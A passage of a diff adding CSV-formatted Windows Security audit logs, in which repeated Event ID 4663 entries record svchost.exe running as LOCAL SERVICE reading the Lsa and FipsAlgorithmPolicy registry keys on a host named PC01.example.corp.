+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452891</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x420</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452890</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x420</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452889</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x1ac</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452888</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x1ac</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452887</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x420</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452886</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452885</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x420</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452884</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452883</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452882</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452881</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452880</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452879</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452878</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452877</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452876</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
